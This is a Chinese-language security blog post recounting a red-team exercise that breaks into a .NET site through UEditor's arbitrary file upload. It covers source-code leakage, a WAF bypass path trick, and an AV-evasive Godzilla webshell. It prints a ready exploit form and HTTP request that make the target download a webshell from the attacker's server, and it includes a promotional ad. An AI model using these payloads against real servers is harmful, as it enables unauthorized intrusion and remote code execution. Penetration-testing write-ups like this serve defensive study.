記某次攻防演練:大戰UEditor並突破

蚁景网安实验室發表於2024-06-28

前言

最近參與某次攻防演練,透過前期資訊收集,發現某靶標單位存在某域名備案。

image-20240514214308675

透過fofa搜尋子域名站點,發現存在一個子域名的61000埠開放著一個後臺,於是開始進行滲透。

image-20240514214548286

目錄掃描

進行目錄掃描嗎,發現/bin.rar路徑可以訪問到一個壓縮檔案。

image-20240514215942617

使用下載器下載到電腦,開啟壓縮包,猜測內容為站點原始碼,程式碼為.net形式,使用c#語言編寫。

image-20240514220414191

C#程式碼經過編譯後為dll檔案形式,根據dll檔案命名規則和.net型別程式碼格式。我們可以初步判定xxx.Application.Web.dll檔案中存在主要的後端邏輯程式碼。

image-20240514221038999

但是dll為二進位制檔案我們無法直接檢視,因此需要使用dnspy進行反編譯檢視。

【----幫助網安學習,以下所有學習資料免費領!加vx:dctintin,備註 “部落格園” 獲取!】

 ① 網安學習成長路徑思維導圖
 ② 60+網安經典常用工具包
 ③ 100+SRC漏洞分析報告
 ④ 150+網安攻防實戰技術電子書
 ⑤ 最權威CISSP 認證考試指南+題庫
 ⑥ 超1800頁CTF實戰技巧手冊
 ⑦ 最新網安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測指南(安卓+IOS)

檢視方法:將dll檔案丟入dnspy即可。

image-20240514221649029

UEditor的曲折利用

在原始碼中發現該系統使用UEditor。

image-20240514222621847

可得UEditor的路徑/Utility/UEditor/controller.ashx

image-20240514224050050

訪問關鍵介面/Utility/UEditor/?action=catchimage/Utility/UEditor/?action=config

然而伺服器返回403無法訪問。

image-20240514224921144

image-20240514225148874

透過Fuzz發現403的原因是有可能是因為waf或者edr的攔截。

使用/Utility/UEditor/.css?action=catchimage可進行bypass,成功訪問關鍵介面。

image-20240514225345566

接下來就是參考UEditor .net版本的任意檔案上傳漏洞進行上傳哥斯拉jsp webshell。

漏洞利用參考連結:

https://www.freebuf.com/vuls/181814.html

image-20240514225544573

上傳過程中發現普通哥斯拉jsp webshell上傳後就被殺軟攔截無法訪問。

於是用https://github.com/Tas9er/ByPassGodzilla專案對webshell進行免殺處理。

方可成功上傳webshell並進行連線,至此該UEditor站點利用完成,後面就是愉快的打內網。

image-20240514230422817

UEditor的簡便利用

傳統的UEditor利用都是本地編寫一個html檔案中包含一個表單,透過提交表單使目標伺服器根據提交的圖片馬地址下載webshell。

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">
  <p>shell addr:<input type="text" name="source[]" /></p >
  <inputtype="submit" value="Submit" />
</form>

原理還是透過http請求傳送圖片馬地址,所以直接在burpsuite發包也可以達到相同的效果,省去製作html檔案的步驟。

POST /替換漏洞URL地址拼接/UEditor/controller.ashx?action=catchimage HTTP/1.1
Host: x.x.x.x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
​
source[]=http://替換為自己伺服器開啟http服務的URL地址/666.jpg?.aspx

請求傳送後,返回包返回webshell路徑。

image-20240514231742498

總結

  1. UEditor作為熱門常見漏洞,在大型企業集團中的.net老舊系統中非常常見,相關的利用方法以及繞過方法需要非常熟練,方可快人一步迅速拿下許可權;

  2. 在滲透測試過程中,我們可能會遇到一些與實驗環境或他人分享的情況不同的挑戰。這時,我們需要具備排查問題原因的能力。例如,在利用漏洞的過程中,可能會遇到無法上傳webshell或請求被WAF攔截等情況。我們需要根據場景,修改payload或使用fuzz等技術進行繞過,直到成功利用漏洞並獲取所需的許可權,完成滲透。大戰UEditor並突破。

更多網安技能的線上實操練習,請點選這裡>>

相關文章